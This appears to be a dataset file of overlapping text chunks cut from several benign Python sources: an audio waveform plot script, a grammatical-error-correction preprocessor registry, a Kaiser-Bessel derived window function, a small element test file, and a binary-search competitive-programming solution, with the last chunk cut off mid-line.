axes[c].plot(time_axis, waveform[c], linewidth=1)", "type=float, default=0.5) parser.add_argument('--time2', type=float, default=1) parser.add_argument('--gpu', default='0') args = parser.parse_args() os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu", "ylim=None): waveform = waveform.numpy() num_channels, num_frames = waveform.shape time_axis = torch.arange(0, num_frames) /", "sample_rate figure, axes = plt.subplots(num_channels, 1) if num_channels == 1: axes = [axes]", "default=0.5) parser.add_argument('--time2', type=float, default=1) parser.add_argument('--gpu', default='0') args = parser.parse_args() os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu waveform1," ]
[ "FCEPreprocessor from .jfleg import JFLEGPreprocessor class DatasetPreprocessorNotFoundError(ValueError): def __init__(self, preprocessor_name: str): super().__init__() self.message", ".fce import FCEPreprocessor from .jfleg import JFLEGPreprocessor class DatasetPreprocessorNotFoundError(ValueError): def __init__(self, preprocessor_name: str):", "super().__init__() self.message = f'Dataset preprocessor with name {preprocessor_name} was not found.' def get_dataset_preprocessor(preprocessor_name:", "'aesw': AESWPreprocessor, 'lang8': Lang8Preprocessor, 'fce': FCEPreprocessor, 'jfleg': JFLEGPreprocessor } if preprocessor_name not in", "AESWPreprocessor, 'lang8': Lang8Preprocessor, 'fce': FCEPreprocessor, 'jfleg': JFLEGPreprocessor } if preprocessor_name not in preprocessors:", ".lang8 import Lang8Preprocessor from .fce import FCEPreprocessor from .jfleg import JFLEGPreprocessor class DatasetPreprocessorNotFoundError(ValueError):", "import AESWPreprocessor from .lang8 import Lang8Preprocessor from .fce import FCEPreprocessor from .jfleg import", "from .aesw import AESWPreprocessor from .lang8 import Lang8Preprocessor from .fce import FCEPreprocessor from", "FCEPreprocessor, 'jfleg': JFLEGPreprocessor } if preprocessor_name not in preprocessors: raise DatasetPreprocessorNotFoundError(preprocessor_name=preprocessor_name) return preprocessors[preprocessor_name]", "'fce': FCEPreprocessor, 'jfleg': JFLEGPreprocessor } if preprocessor_name not in preprocessors: raise DatasetPreprocessorNotFoundError(preprocessor_name=preprocessor_name) return", "preprocessor_name: str): super().__init__() self.message = f'Dataset preprocessor with name {preprocessor_name} was not found.'", "= { 'aesw': AESWPreprocessor, 'lang8': Lang8Preprocessor, 'fce': FCEPreprocessor, 'jfleg': JFLEGPreprocessor } if preprocessor_name", "found.' def get_dataset_preprocessor(preprocessor_name: str): preprocessors = { 'aesw': AESWPreprocessor, 'lang8': Lang8Preprocessor, 'fce': FCEPreprocessor,", "{ 'aesw': AESWPreprocessor, 'lang8': Lang8Preprocessor, 'fce': FCEPreprocessor, 'jfleg': JFLEGPreprocessor } if preprocessor_name not", "= f'Dataset preprocessor with name {preprocessor_name} was not found.' def get_dataset_preprocessor(preprocessor_name: str): preprocessors", "def get_dataset_preprocessor(preprocessor_name: str): preprocessors = { 'aesw': AESWPreprocessor, 'lang8': Lang8Preprocessor, 'fce': FCEPreprocessor, 'jfleg':", "f'Dataset preprocessor with name {preprocessor_name} was not found.' def get_dataset_preprocessor(preprocessor_name: str): preprocessors =", "import Lang8Preprocessor from .fce import FCEPreprocessor from .jfleg import JFLEGPreprocessor class DatasetPreprocessorNotFoundError(ValueError): def", "from .fce import FCEPreprocessor from .jfleg import JFLEGPreprocessor class DatasetPreprocessorNotFoundError(ValueError): def __init__(self, preprocessor_name:", "preprocessor with name {preprocessor_name} was not found.' def get_dataset_preprocessor(preprocessor_name: str): preprocessors = {", "str): preprocessors = { 'aesw': AESWPreprocessor, 'lang8': Lang8Preprocessor, 'fce': FCEPreprocessor, 'jfleg': JFLEGPreprocessor }", "'lang8': Lang8Preprocessor, 'fce': FCEPreprocessor, 'jfleg': JFLEGPreprocessor } if preprocessor_name not in preprocessors: raise", "AESWPreprocessor from .lang8 import Lang8Preprocessor from .fce import FCEPreprocessor from .jfleg import JFLEGPreprocessor", "DatasetPreprocessorNotFoundError(ValueError): def __init__(self, preprocessor_name: str): super().__init__() self.message = f'Dataset preprocessor with name {preprocessor_name}", "from .jfleg import JFLEGPreprocessor class DatasetPreprocessorNotFoundError(ValueError): def __init__(self, preprocessor_name: str): super().__init__() self.message =", "{preprocessor_name} was not found.' def get_dataset_preprocessor(preprocessor_name: str): preprocessors = { 'aesw': AESWPreprocessor, 'lang8':", "str): super().__init__() self.message = f'Dataset preprocessor with name {preprocessor_name} was not found.' def", "class DatasetPreprocessorNotFoundError(ValueError): def __init__(self, preprocessor_name: str): super().__init__() self.message = f'Dataset preprocessor with name", "Lang8Preprocessor, 'fce': FCEPreprocessor, 'jfleg': JFLEGPreprocessor } if preprocessor_name not in preprocessors: raise DatasetPreprocessorNotFoundError(preprocessor_name=preprocessor_name)", "was not found.' def get_dataset_preprocessor(preprocessor_name: str): preprocessors = { 'aesw': AESWPreprocessor, 'lang8': Lang8Preprocessor,", "preprocessors = { 'aesw': AESWPreprocessor, 'lang8': Lang8Preprocessor, 'fce': FCEPreprocessor, 'jfleg': JFLEGPreprocessor } if", "import FCEPreprocessor from .jfleg import JFLEGPreprocessor class DatasetPreprocessorNotFoundError(ValueError): def __init__(self, preprocessor_name: str): super().__init__()", "self.message = f'Dataset preprocessor with name {preprocessor_name} was not found.' def get_dataset_preprocessor(preprocessor_name: str):", "<reponame>AntonYermilov/gec-dataset-analyzer from .aesw import AESWPreprocessor from .lang8 import Lang8Preprocessor from .fce import FCEPreprocessor", "with name {preprocessor_name} was not found.' def get_dataset_preprocessor(preprocessor_name: str): preprocessors = { 'aesw':", ".aesw import AESWPreprocessor from .lang8 import Lang8Preprocessor from .fce import FCEPreprocessor from .jfleg", "not found.' def get_dataset_preprocessor(preprocessor_name: str): preprocessors = { 'aesw': AESWPreprocessor, 'lang8': Lang8Preprocessor, 'fce':", ".jfleg import JFLEGPreprocessor class DatasetPreprocessorNotFoundError(ValueError): def __init__(self, preprocessor_name: str): super().__init__() self.message = f'Dataset", "get_dataset_preprocessor(preprocessor_name: str): preprocessors = { 'aesw': AESWPreprocessor, 'lang8': Lang8Preprocessor, 'fce': FCEPreprocessor, 'jfleg': JFLEGPreprocessor", "JFLEGPreprocessor class DatasetPreprocessorNotFoundError(ValueError): def __init__(self, preprocessor_name: str): super().__init__() self.message = f'Dataset preprocessor with", "import JFLEGPreprocessor class DatasetPreprocessorNotFoundError(ValueError): def __init__(self, preprocessor_name: str): super().__init__() self.message = f'Dataset preprocessor", "__init__(self, preprocessor_name: str): super().__init__() self.message = f'Dataset preprocessor with name {preprocessor_name} was not", "Lang8Preprocessor from .fce import FCEPreprocessor from .jfleg import JFLEGPreprocessor class DatasetPreprocessorNotFoundError(ValueError): def __init__(self,", "def __init__(self, preprocessor_name: str): super().__init__() self.message = f'Dataset preprocessor with name {preprocessor_name} was", "from .lang8 import Lang8Preprocessor from .fce import FCEPreprocessor from .jfleg import JFLEGPreprocessor class", "name {preprocessor_name} was not found.' def get_dataset_preprocessor(preprocessor_name: str): preprocessors = { 'aesw': AESWPreprocessor," ]
[ "+ 1, beta) csum = np.cumsum(kaiserw) halfw = np.sqrt(csum[:-1] / csum[-1]) w[:M//2] =", "https://en.wikipedia.org/wiki/Kaiser_window \"\"\" M = int(M) try: from scipy.signal import kaiser_derived as scipy_kd return", "from scipy.signal import kaiser_derived as scipy_kd return scipy_kd(M, beta) except ImportError: pass if", "1: return np.array([]) if M % 2: raise ValueError( \"Kaiser Bessel Derived windows", "Wikipedia, \"Kaiser window\", https://en.wikipedia.org/wiki/Kaiser_window \"\"\" M = int(M) try: from scipy.signal import kaiser_derived", "less, an empty array is returned. beta : float Kaiser-Bessel window shape parameter.", "are only defined for even number \" \"of taps\" ) w = np.zeros(M)", "if M < 1: return np.array([]) if M % 2: raise ValueError( \"Kaiser", "\"\"\" Return a Kaiser-Bessel derived window. Parameters ---------- M : int Number of", "an empty array is returned. beta : float Kaiser-Bessel window shape parameter. Returns", "import division import numpy as np from scipy.signal import kaiser __all__ = [", "the output window. If zero or less, an empty array is returned. beta", "return scipy_kd(M, beta) except ImportError: pass if M < 1: return np.array([]) if", "M < 1: return np.array([]) if M % 2: raise ValueError( \"Kaiser Bessel", "This window is only defined for an even number of taps. References ----------", "in SciPy \"\"\" from __future__ import division import numpy as np from scipy.signal", "division import numpy as np from scipy.signal import kaiser __all__ = [ 'kaiser_derived',", "output window. If zero or less, an empty array is returned. beta :", "= kaiser(M // 2 + 1, beta) csum = np.cumsum(kaiserw) halfw = np.sqrt(csum[:-1]", "M : int Number of points in the output window. If zero or", ": int Number of points in the output window. If zero or less,", "raise ValueError( \"Kaiser Bessel Derived windows are only defined for even number \"", "number of taps. References ---------- .. [1] Wikipedia, \"Kaiser window\", https://en.wikipedia.org/wiki/Kaiser_window \"\"\" M", "] def kaiser_derived(M, beta): \"\"\" Return a Kaiser-Bessel derived window. Parameters ---------- M", "window shape parameter. Returns ------- w : ndarray The window, normalized to fulfil", "np.array([]) if M % 2: raise ValueError( \"Kaiser Bessel Derived windows are only", "normalized to fulfil the Princen-Bradley condition. Notes ----- This window is only defined", "is returned. beta : float Kaiser-Bessel window shape parameter. Returns ------- w :", "% 2: raise ValueError( \"Kaiser Bessel Derived windows are only defined for even", "w : ndarray The window, normalized to fulfil the Princen-Bradley condition. Notes -----", "kaiser __all__ = [ 'kaiser_derived', ] def kaiser_derived(M, beta): \"\"\" Return a Kaiser-Bessel", "= [ 'kaiser_derived', ] def kaiser_derived(M, beta): \"\"\" Return a Kaiser-Bessel derived window.", "kaiserw = kaiser(M // 2 + 1, beta) csum = np.cumsum(kaiserw) halfw =", "= np.zeros(M) kaiserw = kaiser(M // 2 + 1, beta) csum = np.cumsum(kaiserw)", "SciPy \"\"\" from __future__ import division import numpy as np from scipy.signal import", "of taps. References ---------- .. [1] Wikipedia, \"Kaiser window\", https://en.wikipedia.org/wiki/Kaiser_window \"\"\" M =", "except ImportError: pass if M < 1: return np.array([]) if M % 2:", "only defined for even number \" \"of taps\" ) w = np.zeros(M) kaiserw", "Return a Kaiser-Bessel derived window. Parameters ---------- M : int Number of points", "= int(M) try: from scipy.signal import kaiser_derived as scipy_kd return scipy_kd(M, beta) except", "halfw = np.sqrt(csum[:-1] / csum[-1]) w[:M//2] = halfw w[-M//2:] = halfw[::-1] return w", "----- This window is only defined for an even number of taps. References", "empty array is returned. beta : float Kaiser-Bessel window shape parameter. Returns -------", "only defined for an even number of taps. References ---------- .. [1] Wikipedia,", "window\", https://en.wikipedia.org/wiki/Kaiser_window \"\"\" M = int(M) try: from scipy.signal import kaiser_derived as scipy_kd", "the Princen-Bradley condition. Notes ----- This window is only defined for an even", "Module for windowing functions not found in SciPy \"\"\" from __future__ import division", "a Kaiser-Bessel derived window. Parameters ---------- M : int Number of points in", "The window, normalized to fulfil the Princen-Bradley condition. Notes ----- This window is", "\" \"of taps\" ) w = np.zeros(M) kaiserw = kaiser(M // 2 +", "import kaiser_derived as scipy_kd return scipy_kd(M, beta) except ImportError: pass if M <", "shape parameter. Returns ------- w : ndarray The window, normalized to fulfil the", "return np.array([]) if M % 2: raise ValueError( \"Kaiser Bessel Derived windows are", "Derived windows are only defined for even number \" \"of taps\" ) w", "beta : float Kaiser-Bessel window shape parameter. Returns ------- w : ndarray The", "M = int(M) try: from scipy.signal import kaiser_derived as scipy_kd return scipy_kd(M, beta)", "fulfil the Princen-Bradley condition. Notes ----- This window is only defined for an", "Bessel Derived windows are only defined for even number \" \"of taps\" )", "csum = np.cumsum(kaiserw) halfw = np.sqrt(csum[:-1] / csum[-1]) w[:M//2] = halfw w[-M//2:] =", "__all__ = [ 'kaiser_derived', ] def kaiser_derived(M, beta): \"\"\" Return a Kaiser-Bessel derived", "is only defined for an even number of taps. References ---------- .. [1]", "scipy_kd return scipy_kd(M, beta) except ImportError: pass if M < 1: return np.array([])", "M % 2: raise ValueError( \"Kaiser Bessel Derived windows are only defined for", "kaiser(M // 2 + 1, beta) csum = np.cumsum(kaiserw) halfw = np.sqrt(csum[:-1] /", "int(M) try: from scipy.signal import kaiser_derived as scipy_kd return scipy_kd(M, beta) except ImportError:", "returned. beta : float Kaiser-Bessel window shape parameter. Returns ------- w : ndarray", "derived window. Parameters ---------- M : int Number of points in the output", "parameter. Returns ------- w : ndarray The window, normalized to fulfil the Princen-Bradley", "int Number of points in the output window. If zero or less, an", "2 + 1, beta) csum = np.cumsum(kaiserw) halfw = np.sqrt(csum[:-1] / csum[-1]) w[:M//2]", "np.cumsum(kaiserw) halfw = np.sqrt(csum[:-1] / csum[-1]) w[:M//2] = halfw w[-M//2:] = halfw[::-1] return", "from __future__ import division import numpy as np from scipy.signal import kaiser __all__", "Parameters ---------- M : int Number of points in the output window. If", "windowing functions not found in SciPy \"\"\" from __future__ import division import numpy", "\"Kaiser window\", https://en.wikipedia.org/wiki/Kaiser_window \"\"\" M = int(M) try: from scipy.signal import kaiser_derived as", "= np.cumsum(kaiserw) halfw = np.sqrt(csum[:-1] / csum[-1]) w[:M//2] = halfw w[-M//2:] = halfw[::-1]", "Number of points in the output window. If zero or less, an empty", "beta): \"\"\" Return a Kaiser-Bessel derived window. Parameters ---------- M : int Number", "float Kaiser-Bessel window shape parameter. Returns ------- w : ndarray The window, normalized", "zero or less, an empty array is returned. beta : float Kaiser-Bessel window", "even number of taps. References ---------- .. [1] Wikipedia, \"Kaiser window\", https://en.wikipedia.org/wiki/Kaiser_window \"\"\"", "taps\" ) w = np.zeros(M) kaiserw = kaiser(M // 2 + 1, beta)", ": float Kaiser-Bessel window shape parameter. Returns ------- w : ndarray The window,", "even number \" \"of taps\" ) w = np.zeros(M) kaiserw = kaiser(M //", "defined for an even number of taps. References ---------- .. [1] Wikipedia, \"Kaiser", "\"of taps\" ) w = np.zeros(M) kaiserw = kaiser(M // 2 + 1,", "References ---------- .. [1] Wikipedia, \"Kaiser window\", https://en.wikipedia.org/wiki/Kaiser_window \"\"\" M = int(M) try:", "beta) csum = np.cumsum(kaiserw) halfw = np.sqrt(csum[:-1] / csum[-1]) w[:M//2] = halfw w[-M//2:]", "\"Kaiser Bessel Derived windows are only defined for even number \" \"of taps\"", "w = np.zeros(M) kaiserw = kaiser(M // 2 + 1, beta) csum =", "<reponame>tombackstrom/mdct \"\"\" Module for windowing functions not found in SciPy \"\"\" from __future__", "scipy_kd(M, beta) except ImportError: pass if M < 1: return np.array([]) if M", "// 2 + 1, beta) csum = np.cumsum(kaiserw) halfw = np.sqrt(csum[:-1] / csum[-1])", "functions not found in SciPy \"\"\" from __future__ import division import numpy as", "window is only defined for an even number of taps. References ---------- ..", "as np from scipy.signal import kaiser __all__ = [ 'kaiser_derived', ] def kaiser_derived(M,", "not found in SciPy \"\"\" from __future__ import division import numpy as np", "defined for even number \" \"of taps\" ) w = np.zeros(M) kaiserw =", "or less, an empty array is returned. beta : float Kaiser-Bessel window shape", "Returns ------- w : ndarray The window, normalized to fulfil the Princen-Bradley condition.", "taps. References ---------- .. [1] Wikipedia, \"Kaiser window\", https://en.wikipedia.org/wiki/Kaiser_window \"\"\" M = int(M)", "windows are only defined for even number \" \"of taps\" ) w =", "window. If zero or less, an empty array is returned. beta : float", "for an even number of taps. References ---------- .. [1] Wikipedia, \"Kaiser window\",", "< 1: return np.array([]) if M % 2: raise ValueError( \"Kaiser Bessel Derived", "points in the output window. If zero or less, an empty array is", "If zero or less, an empty array is returned. beta : float Kaiser-Bessel", "np.zeros(M) kaiserw = kaiser(M // 2 + 1, beta) csum = np.cumsum(kaiserw) halfw", "2: raise ValueError( \"Kaiser Bessel Derived windows are only defined for even number", "found in SciPy \"\"\" from __future__ import division import numpy as np from", "[ 'kaiser_derived', ] def kaiser_derived(M, beta): \"\"\" Return a Kaiser-Bessel derived window. Parameters", "window, normalized to fulfil the Princen-Bradley condition. Notes ----- This window is only", "for windowing functions not found in SciPy \"\"\" from __future__ import division import", "an even number of taps. References ---------- .. [1] Wikipedia, \"Kaiser window\", https://en.wikipedia.org/wiki/Kaiser_window", "__future__ import division import numpy as np from scipy.signal import kaiser __all__ =", "kaiser_derived as scipy_kd return scipy_kd(M, beta) except ImportError: pass if M < 1:", "kaiser_derived(M, beta): \"\"\" Return a Kaiser-Bessel derived window. Parameters ---------- M : int", "number \" \"of taps\" ) w = np.zeros(M) kaiserw = kaiser(M // 2", "scipy.signal import kaiser __all__ = [ 'kaiser_derived', ] def kaiser_derived(M, beta): \"\"\" Return", "scipy.signal import kaiser_derived as scipy_kd return scipy_kd(M, beta) except ImportError: pass if M", "Kaiser-Bessel window shape parameter. Returns ------- w : ndarray The window, normalized to", "import kaiser __all__ = [ 'kaiser_derived', ] def kaiser_derived(M, beta): \"\"\" Return a", ": ndarray The window, normalized to fulfil the Princen-Bradley condition. Notes ----- This", "np from scipy.signal import kaiser __all__ = [ 'kaiser_derived', ] def kaiser_derived(M, beta):", "array is returned. beta : float Kaiser-Bessel window shape parameter. Returns ------- w", "window. Parameters ---------- M : int Number of points in the output window.", "ImportError: pass if M < 1: return np.array([]) if M % 2: raise", "\"\"\" Module for windowing functions not found in SciPy \"\"\" from __future__ import", "pass if M < 1: return np.array([]) if M % 2: raise ValueError(", "ValueError( \"Kaiser Bessel Derived windows are only defined for even number \" \"of", "to fulfil the Princen-Bradley condition. Notes ----- This window is only defined for", "------- w : ndarray The window, normalized to fulfil the Princen-Bradley condition. Notes", "[1] Wikipedia, \"Kaiser window\", https://en.wikipedia.org/wiki/Kaiser_window \"\"\" M = int(M) try: from scipy.signal import", "condition. Notes ----- This window is only defined for an even number of", ".. [1] Wikipedia, \"Kaiser window\", https://en.wikipedia.org/wiki/Kaiser_window \"\"\" M = int(M) try: from scipy.signal", "1, beta) csum = np.cumsum(kaiserw) halfw = np.sqrt(csum[:-1] / csum[-1]) w[:M//2] = halfw", "Kaiser-Bessel derived window. Parameters ---------- M : int Number of points in the", "def kaiser_derived(M, beta): \"\"\" Return a Kaiser-Bessel derived window. Parameters ---------- M :", "beta) except ImportError: pass if M < 1: return np.array([]) if M %", "---------- .. [1] Wikipedia, \"Kaiser window\", https://en.wikipedia.org/wiki/Kaiser_window \"\"\" M = int(M) try: from", "for even number \" \"of taps\" ) w = np.zeros(M) kaiserw = kaiser(M", "Princen-Bradley condition. Notes ----- This window is only defined for an even number", "as scipy_kd return scipy_kd(M, beta) except ImportError: pass if M < 1: return", "import numpy as np from scipy.signal import kaiser __all__ = [ 'kaiser_derived', ]", "try: from scipy.signal import kaiser_derived as scipy_kd return scipy_kd(M, beta) except ImportError: pass", "---------- M : int Number of points in the output window. If zero", "numpy as np from scipy.signal import kaiser __all__ = [ 'kaiser_derived', ] def", "'kaiser_derived', ] def kaiser_derived(M, beta): \"\"\" Return a Kaiser-Bessel derived window. Parameters ----------", "in the output window. If zero or less, an empty array is returned.", "if M % 2: raise ValueError( \"Kaiser Bessel Derived windows are only defined", "of points in the output window. If zero or less, an empty array", ") w = np.zeros(M) kaiserw = kaiser(M // 2 + 1, beta) csum", "Notes ----- This window is only defined for an even number of taps.", "\"\"\" from __future__ import division import numpy as np from scipy.signal import kaiser", "from scipy.signal import kaiser __all__ = [ 'kaiser_derived', ] def kaiser_derived(M, beta): \"\"\"", "ndarray The window, normalized to fulfil the Princen-Bradley condition. Notes ----- This window", "\"\"\" M = int(M) try: from scipy.signal import kaiser_derived as scipy_kd return scipy_kd(M," ]
[ "'//div'}) assert repr(b_element) == \"BaseElement: ('xpath', '//div')\" c_element = BaseElement('driver', repr_name='Test', **{'xpath': '//div'})", "\"BaseElement: ('xpath', '//div')\" c_element = BaseElement('driver', repr_name='Test', **{'xpath': '//div'}) assert repr(c_element) == 'Test'", "= BaseElement('driver', **{'xpath': '//div'}) str_ = (\"Selector: ('xpath', '//div'), \" 'Element: None') assert", "b_element = BaseElement('driver', **{'xpath': '//div'}) assert repr(b_element) == \"BaseElement: ('xpath', '//div')\" c_element =", "coding: utf-8 -*- # pylint:disable=protected-access from shawl import BaseElement def test_load_elements(): b_element =", "def test_load_elements(): b_element = BaseElement('driver', **{'xpath': '//div'}) assert b_element._element is None assert b_element._selector", "'//div') def test_check_str_repr(): b_element = BaseElement('driver', **{'xpath': '//div'}) str_ = (\"Selector: ('xpath', '//div'),", "**{'xpath': '//div'}) assert b_element._element is None assert b_element._selector == ('xpath', '//div') def test_check_str_repr():", "'//div'), \" 'Element: None') assert str(b_element) == str_ def test_check_repr(): b_element = BaseElement('driver',", "assert repr(b_element) == \"BaseElement: ('xpath', '//div')\" c_element = BaseElement('driver', repr_name='Test', **{'xpath': '//div'}) assert", "('xpath', '//div') def test_check_str_repr(): b_element = BaseElement('driver', **{'xpath': '//div'}) str_ = (\"Selector: ('xpath',", "'//div'}) str_ = (\"Selector: ('xpath', '//div'), \" 'Element: None') assert str(b_element) == str_", "assert b_element._selector == ('xpath', '//div') def test_check_str_repr(): b_element = BaseElement('driver', **{'xpath': '//div'}) str_", "test_check_str_repr(): b_element = BaseElement('driver', **{'xpath': '//div'}) str_ = (\"Selector: ('xpath', '//div'), \" 'Element:", "('xpath', '//div'), \" 'Element: None') assert str(b_element) == str_ def test_check_repr(): b_element =", "\" 'Element: None') assert str(b_element) == str_ def test_check_repr(): b_element = BaseElement('driver', **{'xpath':", "assert b_element._element is None assert b_element._selector == ('xpath', '//div') def test_check_str_repr(): b_element =", "(\"Selector: ('xpath', '//div'), \" 'Element: None') assert str(b_element) == str_ def test_check_repr(): b_element", "'Element: None') assert str(b_element) == str_ def test_check_repr(): b_element = BaseElement('driver', **{'xpath': '//div'})", "None') assert str(b_element) == str_ def test_check_repr(): b_element = BaseElement('driver', **{'xpath': '//div'}) assert", "def test_check_str_repr(): b_element = BaseElement('driver', **{'xpath': '//div'}) str_ = (\"Selector: ('xpath', '//div'), \"", "str_ def test_check_repr(): b_element = BaseElement('driver', **{'xpath': '//div'}) assert repr(b_element) == \"BaseElement: ('xpath',", "BaseElement('driver', **{'xpath': '//div'}) assert repr(b_element) == \"BaseElement: ('xpath', '//div')\" c_element = BaseElement('driver', repr_name='Test',", "= BaseElement('driver', **{'xpath': '//div'}) assert repr(b_element) == \"BaseElement: ('xpath', '//div')\" c_element = BaseElement('driver',", "== str_ def test_check_repr(): b_element = BaseElement('driver', **{'xpath': '//div'}) assert repr(b_element) == \"BaseElement:", "b_element = BaseElement('driver', **{'xpath': '//div'}) assert b_element._element is None assert b_element._selector == ('xpath',", "== ('xpath', '//div') def test_check_str_repr(): b_element = BaseElement('driver', **{'xpath': '//div'}) str_ = (\"Selector:", "= (\"Selector: ('xpath', '//div'), \" 'Element: None') assert str(b_element) == str_ def test_check_repr():", "BaseElement('driver', **{'xpath': '//div'}) assert b_element._element is None assert b_element._selector == ('xpath', '//div') def", "str_ = (\"Selector: ('xpath', '//div'), \" 'Element: None') assert str(b_element) == str_ def", "b_element = BaseElement('driver', **{'xpath': '//div'}) str_ = (\"Selector: ('xpath', '//div'), \" 'Element: None')", "# -*- coding: utf-8 -*- # pylint:disable=protected-access from shawl import BaseElement def test_load_elements():", "**{'xpath': '//div'}) str_ = (\"Selector: ('xpath', '//div'), \" 'Element: None') assert str(b_element) ==", "test_check_repr(): b_element = BaseElement('driver', **{'xpath': '//div'}) assert repr(b_element) == \"BaseElement: ('xpath', '//div')\" c_element", "str(b_element) == str_ def test_check_repr(): b_element = BaseElement('driver', **{'xpath': '//div'}) assert repr(b_element) ==", "== \"BaseElement: ('xpath', '//div')\" c_element = BaseElement('driver', repr_name='Test', **{'xpath': '//div'}) assert repr(c_element) ==", "<reponame>oiakinat/shawl # -*- coding: utf-8 -*- # pylint:disable=protected-access from shawl import BaseElement def", "-*- coding: utf-8 -*- # pylint:disable=protected-access from shawl import BaseElement def test_load_elements(): b_element", "= BaseElement('driver', **{'xpath': '//div'}) assert b_element._element is None assert b_element._selector == ('xpath', '//div')", "test_load_elements(): b_element = BaseElement('driver', **{'xpath': '//div'}) assert b_element._element is None assert b_element._selector ==", "from shawl import BaseElement def test_load_elements(): b_element = BaseElement('driver', **{'xpath': '//div'}) assert b_element._element", "import BaseElement def test_load_elements(): b_element = BaseElement('driver', **{'xpath': '//div'}) assert b_element._element is None", "def test_check_repr(): b_element = BaseElement('driver', **{'xpath': '//div'}) assert repr(b_element) == \"BaseElement: ('xpath', '//div')\"", "assert str(b_element) == str_ def test_check_repr(): b_element = BaseElement('driver', **{'xpath': '//div'}) assert repr(b_element)", "**{'xpath': '//div'}) assert repr(b_element) == \"BaseElement: ('xpath', '//div')\" c_element = BaseElement('driver', repr_name='Test', **{'xpath':", "-*- # pylint:disable=protected-access from shawl import BaseElement def test_load_elements(): b_element = BaseElement('driver', **{'xpath':", "'//div'}) assert b_element._element is None assert b_element._selector == ('xpath', '//div') def test_check_str_repr(): b_element", "is None assert b_element._selector == ('xpath', '//div') def test_check_str_repr(): b_element = BaseElement('driver', **{'xpath':", "None assert b_element._selector == ('xpath', '//div') def test_check_str_repr(): b_element = BaseElement('driver', **{'xpath': '//div'})", "repr(b_element) == \"BaseElement: ('xpath', '//div')\" c_element = BaseElement('driver', repr_name='Test', **{'xpath': '//div'}) assert repr(c_element)", "b_element._selector == ('xpath', '//div') def test_check_str_repr(): b_element = BaseElement('driver', **{'xpath': '//div'}) str_ =", "BaseElement('driver', **{'xpath': '//div'}) str_ = (\"Selector: ('xpath', '//div'), \" 'Element: None') assert str(b_element)", "b_element._element is None assert b_element._selector == ('xpath', '//div') def test_check_str_repr(): b_element = BaseElement('driver',", "utf-8 -*- # pylint:disable=protected-access from shawl import BaseElement def test_load_elements(): b_element = BaseElement('driver',", "# pylint:disable=protected-access from shawl import BaseElement def test_load_elements(): b_element = BaseElement('driver', **{'xpath': '//div'})", "pylint:disable=protected-access from shawl import BaseElement def test_load_elements(): b_element = BaseElement('driver', **{'xpath': '//div'}) assert", "shawl import BaseElement def test_load_elements(): b_element = BaseElement('driver', **{'xpath': '//div'}) assert b_element._element is", "BaseElement def test_load_elements(): b_element = BaseElement('driver', **{'xpath': '//div'}) assert b_element._element is None assert" ]
[ "in range(1, n): if arr[i] - last >= gap: cnt += 1 last", "import sys si = sys.stdin.readline n, m = map(int, si().split()) arr = [int(si())", "end, k): while start <= end: mid = (start + end) // 2", ">= gap: cnt += 1 last = arr[i] return cnt def search(start, end,", "= mid else: end = mid - 1 return res print(search(MIN, MAX, m))", "= arr[i] return cnt def search(start, end, k): while start <= end: mid", "start <= end: mid = (start + end) // 2 cnt = get_count(mid)", "def get_count(gap): cnt = 1 last = arr[0] for i in range(1, n):", "<= end: mid = (start + end) // 2 cnt = get_count(mid) if", "- last >= gap: cnt += 1 last = arr[i] return cnt def", "n): if arr[i] - last >= gap: cnt += 1 last = arr[i]", "cnt = get_count(mid) if cnt >= k: start = mid + 1 res", "map(int, si().split()) arr = [int(si()) for _ in range(n)] arr.sort() MIN = 1", "// 2 cnt = get_count(mid) if cnt >= k: start = mid +", "if cnt >= k: start = mid + 1 res = mid else:", "start = mid + 1 res = mid else: end = mid -", "last >= gap: cnt += 1 last = arr[i] return cnt def search(start,", "= 1 MAX = arr[-1] - arr[0] def get_count(gap): cnt = 1 last", "cnt def search(start, end, k): while start <= end: mid = (start +", "mid + 1 res = mid else: end = mid - 1 return", "= [int(si()) for _ in range(n)] arr.sort() MIN = 1 MAX = arr[-1]", "cnt = 1 last = arr[0] for i in range(1, n): if arr[i]", "sys si = sys.stdin.readline n, m = map(int, si().split()) arr = [int(si()) for", "arr[i] return cnt def search(start, end, k): while start <= end: mid =", "gap: cnt += 1 last = arr[i] return cnt def search(start, end, k):", "end: mid = (start + end) // 2 cnt = get_count(mid) if cnt", "2 cnt = get_count(mid) if cnt >= k: start = mid + 1", "- arr[0] def get_count(gap): cnt = 1 last = arr[0] for i in", "m = map(int, si().split()) arr = [int(si()) for _ in range(n)] arr.sort() MIN", "# BOJ 2110 import sys si = sys.stdin.readline n, m = map(int, si().split())", "= map(int, si().split()) arr = [int(si()) for _ in range(n)] arr.sort() MIN =", "arr[i] - last >= gap: cnt += 1 last = arr[i] return cnt", "= sys.stdin.readline n, m = map(int, si().split()) arr = [int(si()) for _ in", "get_count(gap): cnt = 1 last = arr[0] for i in range(1, n): if", "k): while start <= end: mid = (start + end) // 2 cnt", "1 last = arr[0] for i in range(1, n): if arr[i] - last", "1 res = mid else: end = mid - 1 return res print(search(MIN,", "arr[0] for i in range(1, n): if arr[i] - last >= gap: cnt", "if arr[i] - last >= gap: cnt += 1 last = arr[i] return", "arr[-1] - arr[0] def get_count(gap): cnt = 1 last = arr[0] for i", "2110 import sys si = sys.stdin.readline n, m = map(int, si().split()) arr =", "for i in range(1, n): if arr[i] - last >= gap: cnt +=", "return cnt def search(start, end, k): while start <= end: mid = (start", "= mid + 1 res = mid else: end = mid - 1", "BOJ 2110 import sys si = sys.stdin.readline n, m = map(int, si().split()) arr", "for _ in range(n)] arr.sort() MIN = 1 MAX = arr[-1] - arr[0]", "in range(n)] arr.sort() MIN = 1 MAX = arr[-1] - arr[0] def get_count(gap):", "= arr[-1] - arr[0] def get_count(gap): cnt = 1 last = arr[0] for", "= (start + end) // 2 cnt = get_count(mid) if cnt >= k:", "= get_count(mid) if cnt >= k: start = mid + 1 res =", "+= 1 last = arr[i] return cnt def search(start, end, k): while start", "range(n)] arr.sort() MIN = 1 MAX = arr[-1] - arr[0] def get_count(gap): cnt", "sys.stdin.readline n, m = map(int, si().split()) arr = [int(si()) for _ in range(n)]", "MAX = arr[-1] - arr[0] def get_count(gap): cnt = 1 last = arr[0]", "MIN = 1 MAX = arr[-1] - arr[0] def get_count(gap): cnt = 1", "mid = (start + end) // 2 cnt = get_count(mid) if cnt >=", "i in range(1, n): if arr[i] - last >= gap: cnt += 1", "1 MAX = arr[-1] - arr[0] def get_count(gap): cnt = 1 last =", "arr[0] def get_count(gap): cnt = 1 last = arr[0] for i in range(1,", "cnt += 